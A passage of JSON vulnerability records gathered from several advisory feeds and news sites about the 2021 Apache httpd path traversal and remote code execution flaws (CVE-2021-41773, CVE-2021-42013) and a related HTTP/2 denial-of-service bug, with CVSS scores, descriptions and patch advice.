versions.\nAcknowledgements: Reported by Juan Escobar from Dreamlab\n\t Technologies, Fernando Munoz from NULL Life CTF Team, and\n\t Shungo Kumasaka\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-07T00:00:00", "type": "freebsd", "title": "Apache httpd -- Path Traversal and Remote Code Execution", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-07T00:00:00", "id": "D001C189-2793-11EC-8FB1-206A8A720317", "href": "https://vuxml.freebsd.org/freebsd/d001c189-2793-11ec-8fb1-206a8a720317.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "mageia": [{"lastseen": "2022-04-18T11:19:35", "description": "The updated packages fix a security vulnerabilities: While fuzzing the 2.4.49 httpd, a new null pointer dereference was detected during HTTP/2 request processing, allowing an external source to DoS the server. This requires a specially crafted request. The vulnerability was recently introduced in version 2.4.49. No exploit is known to the project (CVE-2021-41524). A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by \"require all denied\" these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions (CVE-2021-41773). \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-06T14:38:41", "type": "mageia", "title": "Updated apache packages fix security vulnerabilities\n", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41524", "CVE-2021-41773"], "modified": "2021-10-06T14:38:41", "id": "MGASA-2021-0461", "href": "https://advisories.mageia.org/MGASA-2021-0461.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-04-18T11:19:35", "description": "It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution (CVE-2021-42013). \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-08T19:12:12", "type": "mageia", "title": "Updated apache packages fix security vulnerability\n", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-08T19:12:12", "id": "MGASA-2021-0470", "href": "https://advisories.mageia.org/MGASA-2021-0470.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2022-05-09T12:37:14", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEhEkcOGiJJuzgX9o2QOgh1B0OLk6DfE0vDfLNTazcTxOQq17rDeNMkrzD55AKXK2Yqf4fVbhVq-LGf0jODFTpD_1COTLNEcfxOcHoZnz4ZgFhpXfzcSIvQrA08CNNuQQr6-K6gI-xav-mU4-gPaJPVuHJ-AN3yCn1cE70J5y7LBz9Zk1IpvsbCqyHkq>)\n\nApache has issued patches to address two security vulnerabilities, including a path traversal and file disclosure flaw in its HTTP server that it said is being actively exploited in the wild.\n\n\"A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root,\" the open-source project maintainers [noted](<https://httpd.apache.org/security/vulnerabilities_24.html>) in an advisory published Tuesday.\n\n\"If files outside of the document root are not protected by 'require all denied' these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts.\"\n\nThe flaw, tracked as [CVE-2021-41773](<https://nvd.nist.gov/vuln/detail/CVE-2021-41773>), affects only Apache HTTP server version 2.4.49. Ash Daulton and cPanel Security Team have been credited with discovering and reporting the issue on September 29, 2021.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEhq-ZFbYe4ogfL29916B-XMCS8Azo_AXSQRAkFJ-uPYT8Y3Oamz8MeMK9E5KMJNM-453ABtboKaSl1s_gXcFi7fkKhHw7_C-BO0CUS0goVFnR7hPgYsX610L1cvQl5M2s8APgpVCJgz49x0hZ0ks_HiNqVqGCKqqN64MtgIEMFzI9HiJVOgOcSrZ-Qk>) \n--- \nSource: PT SWARM \n \nAlso resolved by Apache is a null pointer dereference vulnerability observed during processing HTTP/2 requests ([CVE-2021-41524](<https://nvd.nist.gov/vuln/detail/CVE-2021-41524>)), thus allowing an adversary to perform a denial-of-service (DoS) attack on the server. The non-profit corporation said the weakness was introduced in version 2.4.49.\n\nApache users are [highly recommended](<https://twitter.com/ptswarm/status/1445376079548624899>) to patch as soon as possible to contain the path traversal vulnerability and mitigate any risk associated with active exploitation of the flaw.\n\n### **Update: **Path Traversal Zero-Day in Apache Leads to RCE Attacks\n\nThe actively exploited Apache HTTP server zero-day flaw is far more critical than previously thought, with new proof-of-concept (PoC) exploits indicating that the vulnerability goes beyond path traversal to equip attackers with remote code execution (RCE) abilities. Security researcher Hacker Fantastic, on [Twitter](<https://twitter.com/hackerfantastic/status/1445523524555186189>), [noted](<https://twitter.com/hackerfantastic/status/1445531829985968137>) that the vulnerability is \"in fact also RCE providing mod-cgi is enabled.\"\n\n[](<https://thehackernews.com/images/-B0cNtw3M82Q/YV6Fz5RqDwI/AAAAAAAA4bs/x6GaIijFl70uXjCVJPiRqjC4wV7qQyWqwCLcBGAsYHQ/s0/apache.jpg>)\n\nWill Dormann, vulnerability analyst at CERT/CC, [corroborated](<https://twitter.com/wdormann/status/1445573881121546245>) the findings, adding \"I was not doing anything clever other than just reproducing essentially the public PoC on Windows when I saw calc.exe spawn.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-05T14:53:00", "type": "thn", "title": "Apache Warns of Zero-Day Exploit in the Wild \u2014 Patch Your Web Servers Now!", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41524", "CVE-2021-41773"], "modified": "2021-10-07T05:31:23", "id": "THN:C6F6C1EB007027C65DE14DE5DA3E74BC", "href": "https://thehackernews.com/2021/10/apache-warns-of-zero-day-exploit-in.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-05-09T12:37:13", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEi9gb5J4PLNEOxKKFX0AtQmn2bTDIG7npW-qA9GjFCnWXfYi-8OQ9SwaukffMhVD5m6v18w7s2IpAunMHlqH_nua56nxSF75TEgWUfDcf1KLmAi1SoDdkWu8fPArAkFqIVxoe7CAN7QOWWYbeyshQ_288uhzAhqP4HxdGBKNYjXqgWRViZ4mY3tWIXj>)\n\nThe Apache Software Foundation on Thursday released additional security updates for its HTTP Server product to remediate what it says is an \"incomplete fix\" for an [actively exploited](<https://thehackernews.com/2021/10/apache-warns-of-zero-day-exploit-in.html>) path traversal and remote code execution flaw that it patched earlier this week.\n\n[CVE-2021-42013](<https://nvd.nist.gov/vuln/detail/CVE-2021-42013>), as the new vulnerability is identified as, builds upon [CVE-2021-41773](<https://nvd.nist.gov/vuln/detail/CVE-2021-41773>), a flaw that impacts Apache web servers running version 2.4.49 and involves a [path normalization](<https://en.wikipedia.org/wiki/URI_normalization>) bug that could enable an adversary to access and view arbitrary files stored on a vulnerable server.\n\nAlthough the flaw was addressed by the maintainers in version 2.4.50, a day after the patches were released it became known that the weakness could also be abused to gain remote code execution if the \"mod_cgi\" module was loaded and the configuration \"require all denied\" was absent, prompting Apache to issue another round of emergency updates.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEgmP9T_SA-o28p-466VGcr78Opierbru3LfDlVgCT7nfEKQKBgOtCzZF_NPOrNPFlQ7eJPylLn2PZZ9equjRD9A7QS110HYjNvalKerBY2eb3flahaEkiLJHDTlWjOd8THOmBPNLqpyAi8vYLJ-uab-C08cNpuWCkNnPjJirzkc_4peC8oz756tcV43>)\n\n\"It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives,\" the company [noted](<https://httpd.apache.org/security/vulnerabilities_24.html#CVE-2021-42013>) in an advisory. \"If files outside of these directories are not protected by the usual default configuration 'require all denied', these requests can succeed. If CGI scripts are also enabled for these aliased paths, this could allow for remote code execution.\"\n\nThe Apache Software Foundation credited Juan Escobar from Dreamlab Technologies, Fernando Mu\u00f1oz from NULL Life CTF Team, and Shungo Kumasaka for reporting the vulnerability. In light of active exploitation, users are highly recommended to update to the latest version (2.4.51) to mitigate the risk associated with the flaw.\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) [said](<https://us-cert.cisa.gov/ncas/current-activity/2021/10/07/apache-releases-http-server-version-2451-address-vulnerabilities>) it's \"seeing ongoing scanning of vulnerable systems, which is expected to accelerate, likely leading to exploitation,\" urging \"organizations to patch immediately if they haven't already.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-08T04:47:00", "type": "thn", "title": "New Patch Released for Actively Exploited 0-Day Apache Path Traversal to RCE Attacks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-11T02:57:44", "id": "THN:A0816B13A402B9865C624E3CA1B06EA5", "href": "https://thehackernews.com/2021/10/new-patch-released-for-actively.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "kaspersky": [{"lastseen": "2022-03-17T07:36:28", "description": "### *Detect date*:\n10/04/2021\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Apache HTTP Server. Malicious users can exploit these vulnerabilities to cause denial of service, execute arbitrary code, obtain sensitive information.\n\n### *Affected products*:\nApache HTTP Server earlier than 2.4.50\n\n### *Solution*:\nUpdate to the latest version \n[Download Apache HTTP Server](<https://httpd.apache.org/download.cgi>)\n\n### *Original advisories*:\n[Fixed in Apache HTTP Server 2.4.50](<https://httpd.apache.org/security/vulnerabilities_24.html#2.4.50>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Apache HTTP Server](<https://threats.kaspersky.com/en/product/Apache-HTTP-Server/>)\n\n### *CVE-IDS*:\n[CVE-2021-41524](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41524>)5.0Critical \n[CVE-2021-41773](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41773>)4.3Warning", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-04T00:00:00", "type": "kaspersky", "title": "KLA12371 Multiple vulnerabilities in Apache HTTP Server", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41524", "CVE-2021-41773"], "modified": "2022-03-16T00:00:00", "id": "KLA12371", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12371/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "osv": [{"lastseen": "2022-11-16T00:20:01", "description": "A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 was found to be incomplete, see CVE-2021-42013.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-05T09:15:00", "type": "osv", "title": "CVE-2021-41773", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-11-16T00:19:58", "id": "OSV:CVE-2021-41773", "href": "https://osv.dev/vulnerability/CVE-2021-41773", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-10-05T20:51:36", "description": "It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions.", "edition": 1, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-07T16:15:00", "type": "osv", "title": "CVE-2021-42013", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-10-05T18:14:00", "id": "OSV:CVE-2021-42013", "href": "https://osv.dev/vulnerability/CVE-2021-42013", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-10-28T14:53:31", "description": "While fuzzing the 2.4.49 httpd, a new null pointer dereference was detected during HTTP/2 request processing, allowing an external source to DoS the server. This requires a specially crafted request. The vulnerability was recently introduced in version 2.4.49. No exploit is known to the project.", "cvss3": {}, "published": "2021-10-05T09:15:00", "type": "osv", "title": "CVE-2021-41524", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2021-41524"], "modified": "2022-10-28T14:53:27", "id": "OSV:CVE-2021-41524", "href": "https://osv.dev/vulnerability/CVE-2021-41524", "cvss": {"score": 0.0, "vector": "NONE"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 was found to be incomplete, see CVE-2021-42013.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Apache HTTP Server Path Traversal Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-41773", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-10T17:26:47", "description": "Apache HTTP server vulnerabilities allow an attacker to use a path traversal attack to map URLs to files outside the expected document root and perform Remote Code Execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Apache HTTP Server 2.4.49 and 2.4.50 Path Traversal", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-42013", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "fedora": [{"lastseen": "2021-11-26T19:07:07", "description": "The Apache HTTP Server is a powerful, efficient, and extensible web server. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-15T00:50:08", "type": "fedora", "title": "[SECURITY] Fedora 35 Update: httpd-2.4.51-2.fc35", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-15T00:50:08", "id": "FEDORA:00C4C3098596", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/WS5RVHOIIRECG65ZBTZY7IEJVWQSQPG3/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-26T19:07:07", "description": "The Apache HTTP Server is a powerful, efficient, and extensible web server. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-12T23:46:03", "type": "fedora", "title": "[SECURITY] Fedora 34 Update: httpd-2.4.51-1.fc34", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-12T23:46:03", "id": "FEDORA:BDD0730B86DF", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/RMIIEFINL6FUIOPD2A3M5XC6DH45Y3CC/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2022-11-03T23:09:44", "description": "A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration \u201crequire all denied\u201d, these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 was found to be incomplete, see CVE-2021-42013.\n\n \n**Recent assessments:** \n \n**zeroSteiner** at October 05, 2021 3:29pm UTC reported:\n\nApache doesn\u2019t typically run with root privileges in most environments so the value of this vulnerability will largely be in using it to leak application-specific secrets such as signing keys, database connection strings, source code etc. Path traversal vulnerabilities are among the easiest to exploit and involve no type of corruption, making them very reliable and safe to use multiple times.\n\nThere will likely be evidence within the Apache access logs of exploitation. Filtering on the HTTP status code could also provide insight into what files the attacker was able to successfully leak.\n\n**noraj** at March 31, 2022 6:23pm UTC reported:\n\nApache doesn\u2019t typically run with root privileges in most environments so the value of this vulnerability will largely be in using it to leak application-specific secrets such as signing keys, database connection strings, source code etc. Path traversal vulnerabilities are among the easiest to exploit and involve no type of corruption, making them very reliable and safe to use multiple times.\n\nThere will likely be evidence within the Apache access logs of exploitation. Filtering on the HTTP status code could also provide insight into what files the attacker was able to successfully leak.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", 